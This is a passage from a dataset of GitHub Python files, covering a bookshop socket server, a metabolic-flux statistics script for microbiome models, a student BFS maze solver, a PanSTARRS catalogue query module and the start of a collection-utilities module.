word_list[closest_match_index]\n\n\ndef correct_typos(message):\n corrected_message = []\n areas = list(set([walk[\"area\"] for walk in walks]))\n difficulties = list(set([walk[\"difficulty\"] for walk in walks]))\n commands = [\"Search\", \"Buy\", \"exit\"]\n max_distance_threshold = 2\n \n for i, word in enumerate(message):\n if i == 0: # Command\n closest_command = find_closest_match(word, commands)\n if levenshtein_distance(word, closest_command) <= max_distance_threshold:\n 
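# accept the fuzzy match only when it is within max_distance_threshold (2) edits of the typed word\n 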
corrected_message.append(closest_command)\n else:\n corrected_message.append(word)\n elif i == 1 and message[0] == \"Search\": # Area\n closest_area = find_closest_match(word, areas)\n if levenshtein_distance(word, closest_area) <= max_distance_threshold:\n corrected_message.append(closest_area)\n else:\n corrected_message.append(word)\n elif i == 4 and message[0] == \"Search\": # Difficulty\n closest_difficulty = find_closest_match(word, difficulties)\n if levenshtein_distance(word, closest_difficulty) <= max_distance_threshold:\n corrected_message.append(closest_difficulty)\n else:\n corrected_message.append(word)\n else:\n corrected_message.append(word)\n \n return corrected_message\n\ndef handle_client(conn, addr):\n print(\"Connected by\", addr)\n while True:\n data = conn.recv(1024).decode(\"utf-8\")\n if not data:\n break\n message = data.strip().split(\" \")\n message = correct_typos(message)\n \n print(message)\n try:\n if message[0] == \"Search\":\n area = message[1]\n min_distance = int(message[2])\n max_distance = int(message[3])\n difficulty = message[4]\n recommended_walks = []\n for walk in walks:\n if walk[\"area\"] == area and min_distance <= walk[\"distance\"] <= max_distance and walk[\"difficulty\"] == difficulty:\n recommended_walks.append(f\"{walk['name']}, {walk['book']}, pg {walk['page']}\")\n if recommended_walks:\n recommended_walks_str = \"\\n\".join(recommended_walks)\n conn.send(f\"Recommended walks:\\n{recommended_walks_str}\".encode(\"utf-8\"))\n else:\n conn.send(\"No walks found for the given criteria\".encode(\"utf-8\"))\n\n elif message[0] == \"Buy\":\n customer_name = message[1]\n order = []\n order_cost = 0\n not_enough_books = []\n for i in range(2, len(message), 2):\n book_number = int(message[i])\n book_quantity = int(message[i + 1])\n book = books.get(book_number)\n if book:\n if book[\"inventory\"] >= book_quantity:\n book_cost = book[\"price\"] * book_quantity\n order.append((book[\"name\"], book_quantity, book_cost))\n order_cost += book_cost\n book[\"inventory\"] -= book_quantity\n else:\n not_enough_books.append((book[\"name\"], book[\"inventory\"]))\n if not_enough_books:\n not_enough_books_str = \"\\n\".join([f\"{book_name}: {inventory} available\" for book_name, inventory in not_enough_books])\n conn.send(f\"Insufficient inventory for the following books:\\n{not_enough_books_str}\\n\".encode(\"utf-8\"))\n elif order:\n if customer_name in orders:\n previous_orders = orders[customer_name]\n total_books = sum([order[1] for order in previous_orders + order])\n if total_books > 50:\n conn.send(\"Error: you have reached the maximum number of books you can buy\".encode(\"utf-8\"))\n else:\n order_cost_str = f\"Order cost: £{order_cost:.2f}\"\n order_str = \"\\n\".join([f\"{book_name} x {book_quantity}: £{book_cost:.2f}\" for book_name, book_quantity, book_cost in order])\n if order_cost > 75:\n order_cost_str += f\"\\nDiscount applied: £{order_cost * 0.1:.2f}\"\n order_cost -= order_cost * 0.1\n conn.send(f\"{order_str}\\n{order_cost_str}\".encode(\"utf-8\"))\n orders[customer_name] = previous_orders + order\n else:\n order_cost_str = f\"Order cost: £{order_cost:.2f}\"\n order_str = \"\\n\".join([f\"{book_name} x {book_quantity}: £{book_cost:.2f}\" for book_name, book_quantity, book_cost in order])\n if order_cost > 75:\n order_cost_str += f\"\\nDiscount applied: £{order_cost * 0.1:.2f}\"\n order_cost -= order_cost * 0.1\n conn.send(f\"{order_str}\\n{order_cost_str}\".encode(\"utf-8\"))\n orders[customer_name] = order\n else:\n conn.send(\"No books 
ordered\".encode(\"utf-8\"))\n\n elif message[0] == \"exit\":\n break\n else:\n conn.send(\"Invalid request. Try a command from our command library\".encode(\"utf-8\"))\n \n except:\n conn.send(\"Didn't follow the right command format; it's Search [Area Where You Want to Walk] [Minimum Length in Miles] [Maximum Length in Miles] [Level of Difficulty]\".encode(\"utf-8\"))\n \n\n conn.close()\n\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_socket.bind((\"localhost\", 12345))\nserver_socket.listen(5)\n\nwhile True:\n conn, addr = server_socket.accept()\n client_thread = threading.Thread(target=handle_client, args=(conn, addr))\n client_thread.start()\n","repo_name":"emocreator/Client_Server_Project_Uni","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":9497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7301101647","text":"import os\nimport numpy as np\nimport copy\nimport scipy.stats\nfrom scipy.stats import hypergeom\nfrom bootstrapAGORAIBD import writeData\n\ndef calcEigs(bigmap,eigminarr,eigmaxarr,eigmeanarr):\n mergedFI = open('/mnt/vdb/home/ubuntu2/tobemerged2.txt')\n mergedFI.readline()\n rxnstosubs = {}\n for line in mergedFI:\n words = line.strip().split('\\t')\n if len(words)==3:\n rxnstosubs[words[0]] = words[2]\n mergedFI.close()\n for ithIdx in bigmap:\n for jthIdx in bigmap[ithIdx]:\n competecount = 0\n coopcount = 0\n for rxn in bigmap[ithIdx][jthIdx]:\n if rxn in rxnstosubs and (rxnstosubs[rxn]=='Transport, extracellular' or rxnstosubs[rxn]=='Transport'):\n flux1 = bigmap[ithIdx][jthIdx][rxn][0]\n flux2 = bigmap[ithIdx][jthIdx][rxn][1]\n if flux1!=0 and flux2!=0:\n if (flux1>0 and flux2>0) or (flux1<0 and flux2<0):\n competecount += 1\n interactMat[ithIdx,jthIdx] += -abs(flux1)-abs(flux2)\n elif (flux1>0 and flux2<0) or (flux1<0 and flux2>0):\n coopcount += 1\n interactMat[ithIdx,jthIdx] += abs(flux1)+abs(flux2)\n if competecount>0 or coopcount>0:\n pass\n #print(ithIdx)\n #print(jthIdx)\n #print(competecount)\n #print(coopcount)\n interactMat2 = copy.deepcopy(interactMat)\n for i in range(len(interactMat)):\n nonzerovals = interactMat[i,interactMat[i,:]!=0]\n if len(nonzerovals)!=0:\n nonzeromean = np.mean(nonzerovals)\n for j in range(len(interactMat[i])):\n interactMat2[i,j] += nonzeromean\n for i in range(len(interactMat[0])):\n nonzerovals = interactMat[interactMat[:,i]!=0,i]\n if len(nonzerovals)!=0:\n nonzeromean = np.mean(nonzerovals)\n for j in range(len(interactMat)):\n interactMat2[j,i] += nonzeromean\n [eigvals,eigvectors] = np.linalg.eig(interactMat2)\n if len(eigminarr)==0:\n for k in range(len(eigvals)):\n eigminarr.append(eigvals[k].real)\n else:\n for k in range(len(eigminarr)):\n if eigvals[k]<eigminarr[k]:\n eigminarr[k] = eigvals[k].real\n if len(eigmaxarr)==0:\n for k in range(len(eigvals)):\n eigmaxarr.append(eigvals[k].real)\n else:\n for k in range(len(eigmaxarr)):\n if eigvals[k]>eigmaxarr[k]:\n eigmaxarr[k] = eigvals[k].real\n if len(eigmeanarr)==0:\n for k in range(len(eigvals)):\n eigmeanarr.append(eigvals[k].real)\n else:\n for k in range(len(eigmeanarr)):\n eigmeanarr[k] += eigvals[k].real\n print(grouplabelarr[z1])\n print(grouparr[z1][z])\n print(eigvals[:10])\n outFI = open('/mnt/vdb/home/ubuntu2/interactMatTemp'+grouparr[z1][z]+'.txt','w')\n for i in range(len(interactMat2)):\n for j in range(len(interactMat2)-1):\n outFI.write(str(interactMat2[i,j])+'\\t')\n outFI.write(str(interactMat2[i,772])+'\\n')\n outFI.close()\n return [eigminarr,eigmaxarr,eigmeanarr]\n \nif __name__=='__main__':\n\n inFI = open('/mnt/vdb/home/ubuntu2/tobemerged2.txt')\n tobemerged2map = {}\n for line in inFI:\n words = line.strip().split('\\t')\n 
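# tobemerged2.txt is assumed, from the parsing below, to be tab-separated:\n # reaction id, reaction name, and an optional subsystem column\n 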
if len(words)==2:\n words.append('')\n tobemerged2map[words[0]] = [words[1],words[2]]\n inFI.close()\n\n inputDir = '/mnt/vdb/home/ubuntu2/MATLAB/SEED/output/simulateSmallModelsCombined/'\n\n #diabetesctrl = ['BGI-06A','N044A','SZEY-75A']\n #diabetestype2nomet = ['NG-5636_551','DOM024','DLM001']\n diabetesctrl = ['BGI-06A','N044A','SZEY-75A','MH0189','MH0181','N029A','NLM031','MH0439','MH0431','MH0024']\n diabetestype2nomet = ['NG-5636_551','DOM024','DLM001','MH0334','DLM027','MH0370','DOM023','DLM019','DLM028','DLM012','MH0345']\n HMP2Normal = ['206703','206704','206700']\n HMP2IBD = ['206701','206708','206709']\n MHnormal = ['MH0005','MH0006','MH0008']\n MHobese = ['MH0001','MH0002','MH0003']\n grouparr = [diabetesctrl,diabetestype2nomet]#,HMP2Normal,HMP2IBD,MHnormal,MHobese]\n grouplabelarr = ['diabetesctrl','diabetestype2nomet']#,'HMP2Normal','HMP2IBD','MHnormal','MHobese']\n analyzeSingle = True\n for z1 in range(len(grouparr)):\n if not analyzeSingle:\n eigminarr = []\n eigmaxarr = []\n eigmeanarr = []\n if z1%2==0:\n rxndiffmap = {}\n for z in range(len(grouparr[z1])):\n count = 0\n interactMat = np.zeros([773,773])\n bigmap = {}\n for afileorig in os.listdir(inputDir):\n if afileorig.endswith('.txt'):\n afile = afileorig[:len(afileorig)-4]\n words = afile.split('_')\n if words[1]==grouparr[z1][z] and ((analyzeSingle and len(words)==3) or (not analyzeSingle and len(words)==4)):\n count = count+1\n print(count)\n ithIdx = int(words[2])\n if not analyzeSingle:\n jthIdx = int(words[3])\n inFI = open(inputDir+afileorig)\n inFI.readline()\n for line in inFI:\n linewords = line.strip().split('\\t')\n speciesnum = -1\n if (linewords[2].split('_')[0]=='1' or linewords[2].split('_')[0]=='2') or analyzeSingle:\n if (linewords[2].split('_')[0]=='1' or linewords[2].split('_')[0]=='2'):\n speciesnum = int(linewords[2].split('_')[0])\n rxn = linewords[2].split('_')\n rxn = '_'.join(rxn[1:])\n elif analyzeSingle:\n rxn = linewords[2]\n rxn = rxn.replace('_LSQBKT','')\n rxn = rxn.replace('_RSQBKT','')\n rxn = rxn.replace('_LPAREN','')\n rxn = rxn.replace('_RPAREN','')\n rxn = rxn.replace('DASH','-')\n if rxn not in rxndiffmap:\n rxndiffmap[rxn] = [{},{}]\n if z1%2==0:\n if ithIdx not in rxndiffmap[rxn][0]:\n rxndiffmap[rxn][0][ithIdx] = []\n rxndiffmap[rxn][0][ithIdx].append(float(linewords[0]))\n else:\n if ithIdx not in rxndiffmap[rxn][1]:\n rxndiffmap[rxn][1][ithIdx] = []\n rxndiffmap[rxn][1][ithIdx].append(float(linewords[0]))\n if not analyzeSingle:\n if ithIdx not in bigmap:\n bigmap[ithIdx] = {}\n if jthIdx not in bigmap[ithIdx]:\n bigmap[ithIdx][jthIdx] = {}\n if rxn not in bigmap[ithIdx][jthIdx]:\n bigmap[ithIdx][jthIdx][rxn] = [0,0]\n #print('HERE')\n bigmap[ithIdx][jthIdx][rxn][speciesnum-1] = float(linewords[0])\n\n if not analyzeSingle:\n [eigminarr,eigmaxarr,eigmeanarr] = calcEigs(bigmap,eigminarr,eigmaxarr,eigmeanarr)\n\n if not analyzeSingle:\n onetoten = ['_01','_02','_03','_04','_05','_06','_07','_08','_09','_10']\n for k in range(len(eigmeanarr)):\n eigmeanarr[k] = eigmeanarr[k]/3\n writeData([onetoten,eigmeanarr,eigminarr,eigmaxarr],'/mnt/vdb/home/ubuntu2/eig'+grouplabelarr[z1]+'.txt',delimiter='\\t',headers=['eignum','eigval','lower','upper'])\n\n if z1%2==1:\n if analyzeSingle:\n rxndiffmaptemp = {}\n for rxn in rxndiffmap:\n rxndiffmaptemp[rxn] = [[],[]]\n for k in [0,1]:\n for ithIdx in rxndiffmap[rxn][k]:\n rxndiffmaptemp[rxn][k].append(np.mean(rxndiffmap[rxn][k][ithIdx]))\n if k==0:\n k1=1\n else:\n k1=0\n if ithIdx in rxndiffmap[rxn][k1]:\n 
rxndiffmaptemp[rxn][k1].append(np.mean(rxndiffmap[rxn][k1][ithIdx]))\n else:\n rxndiffmaptemp[rxn][k1].append(0)\n rxndiffmap = rxndiffmaptemp\n else:\n rxndiffmaptemp = {}\n for rxn in rxndiffmap:\n rxndiffmaptemp[rxn] = [[],[]]\n for k in [0,1]:\n for ithIdx in rxndiffmap[rxn][k]:\n for l in range(len(rxndiffmap[rxn][k][ithIdx])):\n rxndiffmaptemp[rxn][k].append(rxndiffmap[rxn][k][ithIdx][l])\n rxndiffmap = rxndiffmaptemp\n \n if z1==1:\n diabetesrxndiffmap = rxndiffmap\n if z1==3:\n IBDrxndiffmap = rxndiffmap\n if z1==5:\n normobeserxndiffmap = rxndiffmap\n if z1%2==1:\n rxnarr = rxndiffmap.keys()\n rxnarr.sort()\n pvalarr = []\n rxnnamearr = []\n subarr = []\n meandiffarr = []\n for rxn in rxnarr:\n maxlen = max(len(rxndiffmap[rxn][0]),len(rxndiffmap[rxn][1]))\n if len(rxndiffmap[rxn][0])==0:\n for k in range(len(rxndiffmap[rxn][0]),maxlen):\n rxndiffmap[rxn][0].append(0)\n if len(rxndiffmap[rxn][1])==0:\n for k in range(len(rxndiffmap[rxn][1]),maxlen):\n rxndiffmap[rxn][1].append(0) \n if max(rxndiffmap[rxn][0])!=max(rxndiffmap[rxn][1]) or min(rxndiffmap[rxn][0])!=min(rxndiffmap[rxn][1]):\n if not analyzeSingle:\n [stat, pval] = scipy.stats.mannwhitneyu(rxndiffmap[rxn][0],rxndiffmap[rxn][1])\n else:\n statdiffarr = []\n for k in range(len(rxndiffmap[rxn][0])):\n statdiffarr.append(rxndiffmap[rxn][0][k]-rxndiffmap[rxn][1][k])\n [stat, pval] = scipy.stats.ttest_1samp(statdiffarr,0)\n else:\n pval = 1\n pvalarr.append(pval)\n rxncand = rxn\n if rxncand not in tobemerged2map:\n rxncand = rxn.replace('_c_','c')\n if rxncand not in tobemerged2map:\n rxncand = rxn.replace('_m_','m')\n if rxncand not in tobemerged2map:\n rxncand = rxn.replace('_e_','e')\n if rxncand not in tobemerged2map:\n rxncand = rxn.replace('_p_','p')\n if rxncand not in tobemerged2map:\n rxncand = rxn.replace('EX','EX_')\n if rxncand not in tobemerged2map and rxn.startswith('EX_'):\n rxncand = rxn.replace('_','')\n rxncand = rxncand.replace('EX','EX_')\n \n if rxncand not in tobemerged2map:\n rxncand = rxn.replace('_','')\n rxnnamearr.append(tobemerged2map[rxncand][0])\n subarr.append(tobemerged2map[rxncand][1])\n meandiffarr.append(np.mean(rxndiffmap[rxn][0])-np.mean(rxndiffmap[rxn][1]))\n diffout = '/mnt/vdb/home/ubuntu2/pairwiseSingleSpeciesRxnDistsDiabetes/'+rxncand+'DiffMap.txt'\n rxndiffarr = []\n highlightarr = []\n for k in range(len(rxndiffmap[rxn][0])):\n rxndiffarr.append(rxndiffmap[rxn][0][k])\n highlightarr.append('ctrl')\n for k in range(len(rxndiffmap[rxn][1])):\n rxndiffarr.append(rxndiffmap[rxn][1][k])\n highlightarr.append('t2d')\n writeData([rxndiffarr,highlightarr],diffout,delimiter='\\t',headers=['flux','highlight'])\n\n uniqSubs = np.unique(subarr)\n numrxnsall = []\n numsigrxnsall = []\n hypergeomparrall = []\n for sub in uniqSubs:\n N = len(rxnarr)\n M = sum(np.array(subarr)==sub)\n K = sum(np.array(pvalarr)<.05)\n x = sum(np.logical_and(np.array(pvalarr)<.05,np.array(subarr)==sub))\n numrxnsall.append(M)\n numsigrxnsall.append(x)\n hypergeomparrall.append(1-hypergeom.cdf(x-1,N,M,K))\n numrxnspos = []\n numsigrxnspos = []\n hypergeomparrpos = []\n for sub in uniqSubs:\n N = len(rxnarr)\n M = sum(np.array(subarr)==sub)\n K = sum(np.logical_and(np.array(pvalarr)<.05,np.array(meandiffarr)>0))\n x = sum(np.logical_and(np.logical_and(np.array(pvalarr)<.05,np.array(meandiffarr)>0),np.array(subarr)==sub))\n numrxnspos.append(M)\n numsigrxnspos.append(x)\n hypergeomparrpos.append(1-hypergeom.cdf(x-1,N,M,K))\n numrxnsneg = []\n numsigrxnsneg = []\n hypergeomparrneg = []\n for sub in uniqSubs:\n N = 
len(rxnarr)\n M = sum(np.array(subarr)==sub)\n K = sum(np.logical_and(np.array(pvalarr)<.05,np.array(meandiffarr)<0))\n x = sum(np.logical_and(np.logical_and(np.array(pvalarr)<.05,np.array(meandiffarr)<0),np.array(subarr)==sub))\n numrxnsneg.append(M)\n numsigrxnsneg.append(x)\n hypergeomparrneg.append(1-hypergeom.cdf(x-1,N,M,K))\n\n if z1==1:\n disease='diabetes'\n if z1==3:\n disease='IBD'\n if z1==5:\n disease='normobese'\n if analyzeSingle:\n disease = 'SingleSpecies'+disease\n writeData([rxnarr,rxnnamearr,subarr,pvalarr,meandiffarr],'/mnt/vdb/home/ubuntu2/pairwiseRxnDiff'+disease+'.txt',delimiter='\\t',headers=['rxn','rxnname','sub','wilcoxon p-val','mean flux diff'])\n writeData([uniqSubs,numrxnsall,numsigrxnsall,hypergeomparrall],'/mnt/vdb/home/ubuntu2/pairwiseSubDiffAll'+disease+'.txt',delimiter='\\t',headers=['sub','num reactions','num sig reactions','hypergeometric p-val'])\n writeData([uniqSubs,numrxnspos,numsigrxnspos,hypergeomparrpos],'/mnt/vdb/home/ubuntu2/pairwiseSubDiffPos'+disease+'.txt',delimiter='\\t',headers=['sub','num reactions','num sig reactions','hypergeometric p-val'])\n writeData([uniqSubs,numrxnsneg,numsigrxnsneg,hypergeomparrneg],'/mnt/vdb/home/ubuntu2/pairwiseSubDiffNeg'+disease+'.txt',delimiter='\\t',headers=['sub','num reactions','num sig reactions','hypergeometric p-val'])\n","repo_name":"yw595/SEED","sub_path":"src/analyzeSmallModelsCombined.py","file_name":"analyzeSmallModelsCombined.py","file_ext":"py","file_size_in_byte":15257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33183904955","text":"\ndef create_maze():\n maze = {\n # defining the maze\n # (COLUMN, ROW)\n # following what Mr. Yessen made in class\n (0, 0): [(0, 1)],\n (0, 1): [(0, 2)],\n (0, 2): [(0, 3)],\n (0, 3): [(0, 4), (1, 3)],\n (1, 3): [(1, 2), (1, 4), (2, 3)],\n (2, 3): [],\n (1, 2): [(1, 1)],\n (1, 1): [(1, 0)],\n (1, 0): [(2, 0)],\n (2, 0): [(3, 0)],\n (3, 0): [(3, 1)],\n (3, 1): [(2, 1), (3, 2)],\n (2, 1): [],\n (3, 2): [(2, 2), (4, 2)],\n (2, 2): [],\n (4, 2): [(4, 1)],\n (0, 4): [],\n (1, 4): [(2, 4)],\n (2, 4): [(3, 4)],\n (3, 4): [(4, 4)],\n (4, 4): [(4, 3)],\n (4, 3): [(3, 3)],\n (3, 3): []\n }\n return maze\n\ndef bfs(maze, start, end):\n visited = []\n bfs_q = []\n bfs_q.append(start)\n\n while bfs_q:\n z = bfs_q.pop(0)\n visited.append(z)\n if len(visited) == 1:\n print(\"visit:\", z, \"(S)\")\n else:\n print(\"visit:\", z)\n\n if z == end:\n print(\"\\n\")\n print(\"reached the end point:\", end, \"(G)\")\n break\n\n for i in maze.get(z, []):\n if i not in visited and i not in bfs_q:\n bfs_q.append(i)\n print(\"the neighbour added:\", i)\n\n# run BFS\ndef main():\n while True:\n print(\"1. Use default starting point (0,0) and ending point (2,1) \")\n print(\"2. Manually enter between (0,0) to (4,4)\")\n a = input(\"Please choose between 1 and 2: \")\n\n if a == '1':\n start = (0, 0)\n target = (2, 1)\n break\n elif a == '2':\n start = eval(input(\"Please enter your point of start (0,0 to 4,4) as (column, row): \"))\n target = eval(input(\"Please enter your point of end (0,0 to 4,4) as (column, row): \"))\n if 0 <= start[0] <= 4 and 0 <= start[1] <= 4 and 0 <= target[0] <= 4 and 0 <= target[1] <= 4:\n break\n else:\n print(\"Invalid input. Row and column values must be between 0 and 4.\")\n else:\n print(\"Invalid choice. Please enter 1 or 2.\")\n \n maze = create_maze()\n bfs(maze, start, target)\n\nwhile True:\n main()\n print(\"\\n\")\n try_again = input(\"Do you want to try again? 
(y): \")\n if try_again.lower() == \"y\":\n continue\n else:\n print(\"Thank you!\")\n break\n\n\n#I actually have tried to make a different version of the maze, not following the one in class\n#but sadly it doesnt work as how i wished it work..\n\n# def create_maze():\n# maze = [\n# # top, left, bottom, right\n# # 0 = no wall, 1 = wall, 2 = path\n# [[1, 1, 0, 1], [1, 1, 0, 0], [1, 0, 1, 0], [1, 0, 0, 1], [1, 1, 0, 1]], # row 1\n# [[0, 1, 0, 1], [0, 1, 0, 1], [1, 1, 1, 0], [0, 0, 0, 1], [0, 1, 0, 1]], # row 2\n# [[0, 1, 0, 1], [0, 1, 0, 1], [1, 1, 1, 0], [0, 0, 1, 0], [0, 0, 0, 1]], # row 3\n# [[0, 1, 0, 0], [0, 0, 0, 0], [1, 0, 1, 1], [1, 1, 1, 0], [0, 0, 0, 1]], # row 4\n# [[0, 1, 1, 1], [0, 1, 1, 0], [1, 0, 1, 0], [1, 0, 1, 0], [0, 0, 1, 1]], # row 5\n# ]\n# return maze\n# def is_valid_move(row, col, maze, visited):\n# # 5 is the number of row and column\n# if 0 <= row < 5:\n# if 0 <= col < 5:\n# if (row, col) not in visited: #have to be not visited to avoid revisiting cells that have been visited\n# for i in range (4):\n# if maze[row][col][i]==0:\n# return True\n# else:\n# return False\n# return False\n# maze = create_maze()\n# r_start, c_start = 0, 0\n# r_end, c_end = 1, 2\n# end = (r_end, c_end)\n# visited = set()\n# Q = [(r_start, c_start)] \n\n# while Q:\n# u = Q.pop(0)\n# visited.add(u)\n\n# if u == end:\n# print(\"Reached the target (row, column): \" + str(end))\n# break\n\n# row, col = u\n\n# #direction of movement\n# moves = [(-1, 0), (0, -1), (1, 0), (0, 1)] # top,left,bottom, down\n# for move in moves:\n# new_row, new_col = row + move[0], col + move[1]\n# if is_valid_move(new_row, new_col, maze, visited):\n# Q.append((new_row, new_col)) #appending to the Q\n# visited.add((new_row, new_col)) # input to visited\n\n# print(\"Current bfs_q:\", Q)\n\n# print(\"Visited cells:\", visited)\n","repo_name":"willamjonathan/AI","sub_path":"assignment1/1_maze.py","file_name":"1_maze.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4822352637","text":"import mastcasjobs\nimport healpy as hp\nimport numpy as np\nimport requests\nimport os, sys, re\nimport json\nfrom astropy.io import ascii, fits\nfrom astropy.table import Table, join, hstack, vstack\n\n\ndef parameters(nside,pixel):\n radius = hp.pixelfunc.max_pixrad(nside, degrees=True)*3600\n angles = hp.pix2ang(nside,int(pixel), nest = False, lonlat=True)\n return angles, radius\n \n \ndef fixcolnames(tab):\n \"\"\"Fix column names returned by the casjobs query\n \n Parameters\n ----------\n tab (astropy.table.Table): Input table\n\n Returns reference to original table with column names modified\"\"\"\n\n pat = re.compile(r'\\[(?P[^[]+)\\]')\n for c in tab.colnames:\n m = pat.match(c)\n if not m:\n raise ValueError(\"Unable to parse column name '{}'\".format(c))\n newname = m.group('name')\n tab.rename_column(c,newname)\n return tab\n\ndef query_string(ang0,ang1,radius):\n query = \"\"\"select sot.objID, sot.uniquePspsSTid, sot.ippObjID, sot.surveyID, sot.tessID, sot.projectionID, sot.skyCellID, sot.randomStackObjID, sot.primaryDetection, sot.bestDetection, sot.dvoRegionID, sot.processingVersion,\n sot.gippDetectID, sot.gstackDetectID, sot.gstackImageId, sot.gra, sot.gdec, sot.graErr, sot.gdecErr, sot.gEpoch, sot.gPSFMag, sot.gPSFMagErr, sot.gApMag, sot.gApMagErr, sot.gKronMag, sot.gKronMagErr, sot.ginfoFlag, sot.ginfoFlag2, sot.ginfoFlag3, sot.gnFrames,\n sot.rippDetectID, sot.rstackDetectID, sot.rstackImageId, sot.rra, sot.rdec, 
sot.rraErr, sot.rdecErr, sot.rEpoch, sot.rPSFMag, sot.rPSFMagErr, sot.rApMag, sot.rApMagErr, sot.rKronMag, sot.rKronMagErr, sot.rinfoFlag, sot.rinfoFlag2, sot.rinfoFlag3, sot.rnFrames,\n sot.iippDetectID, sot.istackDetectID, sot.istackImageId, sot.ira, sot.idec, sot.iraErr, sot.idecErr, sot.iEpoch, sot.iPSFMag, sot.iPSFMagErr, sot.iApMag, sot.iApMagErr, sot.iKronMag, sot.iKronMagErr, sot.iinfoFlag, sot.iinfoFlag2, sot.iinfoFlag3, sot.inFrames,\n sot.zippDetectID, sot.zstackDetectID, sot.zstackImageId, sot.zra, sot.zdec, sot.zraErr, sot.zdecErr, sot.zEpoch, sot.zPSFMag, sot.zPSFMagErr, sot.zApMag, sot.zApMagErr, sot.zKronMag, sot.zKronMagErr, sot.zinfoFlag, sot.zinfoFlag2, sot.zinfoFlag3, sot.znFrames,\n sot.yippDetectID, sot.ystackDetectID, sot.ystackImageId, sot.yra, sot.ydec, sot.yraErr, sot.ydecErr, sot.yEpoch, sot.yPSFMag, sot.yPSFMagErr, sot.yApMag, sot.yApMagErr, sot.yKronMag, sot.yKronMagErr, sot.yinfoFlag, sot.yinfoFlag2, sot.yinfoFlag3, sot.ynFrames\n \n\n from fGetNearbyObjEq(\"\"\"+\",\".join([str(ang0),str(ang1),str(radius/60.)])+\"\"\") nb\n inner join StackObjectThin sot on sot.objid=nb.objid\n\n where sot.primaryDetection = 1 \n\"\"\" \n return query\n \n \n\ndef query_function(params, constraints):\n import exception as exc\n params['ang'],params['r'] = parameters(params[\"NSIDE\"],params['pixel']) \n query = query_string(params['ang'][0],params['ang'][1],params['r'])\n jobs = mastcasjobs.MastCasJobs(context=\"PanSTARRS_DR2\")\n \n try:\n table = jobs.quick(query, task_name=\"python cone search\")\n except Exception:\n print(\"Exception. code!=200\")\n table = exc.handling_exception(params,constraints)\n print(\"Extracted {} objects from PS1\".format(len(table)))\n return table, jobs \n\n table = fixcolnames(ascii.read(table))\n table = query_constraints(table, constraints)\n return table, jobs\n\ndef query_constraints(table,constraints):\n band_KronMag = table[''.join([constraints[\"band\"],'KronMag'])]\n band_PSFMag = table[''.join([constraints[\"band\"],'PSFMag'])]\n\n if constraints['use']:\n if constraints[\"type\"]==\"galaxy\":\n constraint = (band_KronMag - band_PSFMag) + 0.192 - 0.120*(band_KronMag - 21.) - 0.018*(band_KronMag - 21.)*(band_KronMag - 21.)\n list1 = np.where((table['gdec']>-999)*(table['gra']>-999)*(band_KronMag>-999)*(band_PSFMag>-999)*(constraint>0)) \n \n elif constraints[\"type\"]==\"star\":\n constraint = (band_KronMag - band_PSFMag) + 0.192 - 0.120*(band_KronMag - 21.) 
- 0.018*(band_KronMag - 21.)*(band_KronMag - 21.)\n list1 = np.where((table['gdec']>-999)*(table['gra']>-999)*(band_KronMag>-999)*(band_PSFMag>-999)*(constraint<0))\n \n else: \n list1 = np.where((table['gdec']>-999)*(table['gra']>-999)*(band_KronMag>-999)*(band_PSFMag>-999))\n else:\n list1 = np.where((table['gdec']>-999)*(table['gra']>-999))\n \n return table[list1]\n","repo_name":"multinverse/PS1zxcorr","sub_path":"query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"9116910645","text":"import collections as col\r\nimport copy\r\nimport itertools\r\nimport math\r\nimport operator\r\n\r\nimport thalesians.tsa.intervals as intervals\r\n\r\ndef sequence_eq(sequence1, sequence2):\r\n return len(sequence1) == len(sequence2) and all(map(operator.eq, sequence1, sequence2))\r\n\r\ndef cmp(x, y):\r\n return (x > y) - (x < y)\r\n\r\ndef most_common(iterable):\r\n sorted_iterable = sorted((x, i) for i, x in enumerate(iterable))\r\n groups = itertools.groupby(sorted_iterable, key=operator.itemgetter(0))\r\n def _auxfun(g):\r\n _, it = g\r\n count = 0\r\n min_index = len(iterable)\r\n for _, where in it:\r\n count += 1\r\n min_index = min(min_index, where)\r\n return count, -min_index\r\n return max(groups, key=_auxfun)[0]\r\n\r\ndef prepend(collection, to_prepend, in_place=False):\r\n if not in_place: collection = copy.copy(collection)\r\n collection[0:0] = to_prepend\r\n return collection\r\n\r\ndef _pad_on_left_with_callable(collection, new_len, padding=None):\r\n return prepend(collection, [padding() for _ in range(new_len - len(collection))], in_place=True)\r\n\r\ndef _pad_on_left_with_noncallable(collection, new_len, padding=None):\r\n return prepend(collection, [padding for _ in range(new_len - len(collection))], in_place=True)\r\n\r\ndef pad_on_left(collection, new_len, padding=None, in_place=False):\r\n if not in_place: collection = copy.copy(collection)\r\n if hasattr(padding, '__call__') or isinstance(padding, col.Callable):\r\n return _pad_on_left_with_callable(collection, new_len, padding)\r\n else:\r\n return _pad_on_left_with_noncallable(collection, new_len, padding)\r\n\r\ndef _pad_on_right_with_callable(collection, new_len, padding=None):\r\n collection.extend([padding() for _ in range(new_len - len(collection))])\r\n return collection\r\n\r\ndef _pad_on_right_with_noncallable(collection, new_len, padding=None):\r\n collection.extend([padding for _ in range(new_len - len(collection))])\r\n return collection\r\n\r\ndef pad_on_right(collection, new_len, padding=None, in_place=False):\r\n if not in_place: collection = copy.copy(collection)\r\n if hasattr(padding, '__call__') or isinstance(padding, col.Callable):\r\n return _pad_on_right_with_callable(collection, new_len, padding)\r\n else:\r\n return _pad_on_right_with_noncallable(collection, new_len, padding)\r\n\r\ndef trim_on_left(collection, new_len, in_place=False):\r\n if not in_place: collection = copy.copy(collection)\r\n del collection[:max(len(collection) - new_len, 0)]\r\n return collection\r\n\r\ndef trim_on_right(collection, new_len, in_place=False):\r\n if not in_place: collection = copy.copy(collection)\r\n del collection[new_len:]\r\n return collection\r\n\r\ndef xconst(value):\r\n while True: yield value\r\n\r\ndef xbatch(size, iterable):\r\n l = len(iterable)\r\n for i in range(0, l, size):\r\n yield iterable[i:min(i + size, l)]\r\n\r\ndef 